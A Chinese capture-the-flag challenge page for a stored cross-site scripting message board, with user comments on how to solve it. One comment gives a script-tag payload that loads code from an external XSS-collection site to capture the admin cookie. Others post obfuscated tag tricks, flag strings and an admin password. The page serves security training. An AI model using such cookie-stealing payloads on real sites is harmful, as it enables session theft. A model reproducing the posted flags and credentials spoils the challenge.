留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3420
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
成朗 3年前

无法访问题目了还404了,还吃了我5个金币??!能退钱嘛?

回复 1

slexce 3年前

试了好几个方法,存在几个问题 1,xss平台获取不了cookie 2,能用dirsearch找到admin.php,找不到sql文件,不知道管理员密码,也不知道密码如何获取 看了playmaker的方法确实可以,打开开发者网络记录日志network,随便发条评论,在post请求标头中含有cookie信息,cookie中就是flag

回复 3
wmfan 3年前

只有原来做过题目的才有cookie,清空浏览器缓存后就找不到flag了,只能先获取admin权限

回复 2

huahua01 3年前

flag{985bcd99b4129ae77c9e01868a8d41c6}

回复 0

wxy1343 3年前

flag{21f9085b8290a0e46f0e23b06993dc80}

回复 0

playmaker 3年前

看评论区方法:1、xss平台,发现获取的是空cookie;2、admin登录:不知道密码,用评论区密码确实可以,但我不知道怎么获得的,故不使用。 自己的方法:直接chrome分析发完评论network元素,直接找到cookie。。

回复 1

千言旅人 3年前

有过滤()'",选插入图片,正常来说填图片链接<Img sRC=//baidu.com/test.jpg>,但是本题已经提供了img标签和http://的头,那插入的时候图片链接就写baidu.com/test.jpg就行。这时发现有回显但是多次尝试后没有收到cookie。 翻评论区拿前辈账密登录admin.php,进去后发现后台管理员看到的内容其实是没有进行过滤()'&q

回复 1

yangc 3年前

1.在xss平台上注册,建项目,生成xss语句。 2.在留言框内插入xss语句。 3.在xss平台收到cookie,得到flag。 4.将收到的flag进行在线URI解码。

回复 1

神里凌华 3年前

5金币做完给3金OuO

回复 1

晚风 3年前

flag{211d9b5b0ae2f9adfc8136e7a8d5aa3d}后面跟上/admin.php user: admin password: 011be4d65feac1a8登录,检查,找到相应的位置就能看见flag

回复 0

piying 3年前

思路:登录XSS平台https://xss.pt/,将如下代码植入<sCRiPt sRC=//i0.al/qUc5></sCrIpT>留言框,点击雁过留声,路过留言;在XSS平台查看得到flag,然后URL解码,得到flag{2276f57f5da12355e4525c634337aa06}

回复 1

WriteUp

image
丶我亚索贼六

5 金币

评分(19)

解题动态

cenyo 攻破了该题 3小时前
billy856 攻破了该题 1天前
fi1y 攻破了该题 4天前
imhacker 攻破了该题 4天前
曦羽 攻破了该题 6天前
等往事风中吹‘ 攻破了该题 6天前
dwx386572657 攻破了该题 7天前
luobosir 攻破了该题 7天前
WW12@ 攻破了该题 8天前
ChatFaro 攻破了该题 8天前
1546546 攻破了该题 9天前
一世温华 攻破了该题 11天前
hull-p 攻破了该题 14天前
凯哥 攻破了该题 15天前
lvchijing 攻破了该题 15天前
baizhi白栀 攻破了该题 16天前
星落. 攻破了该题 17天前
13822005976 攻破了该题 17天前
heting 攻破了该题 21天前
店晓贰 攻破了该题 23天前
问题反馈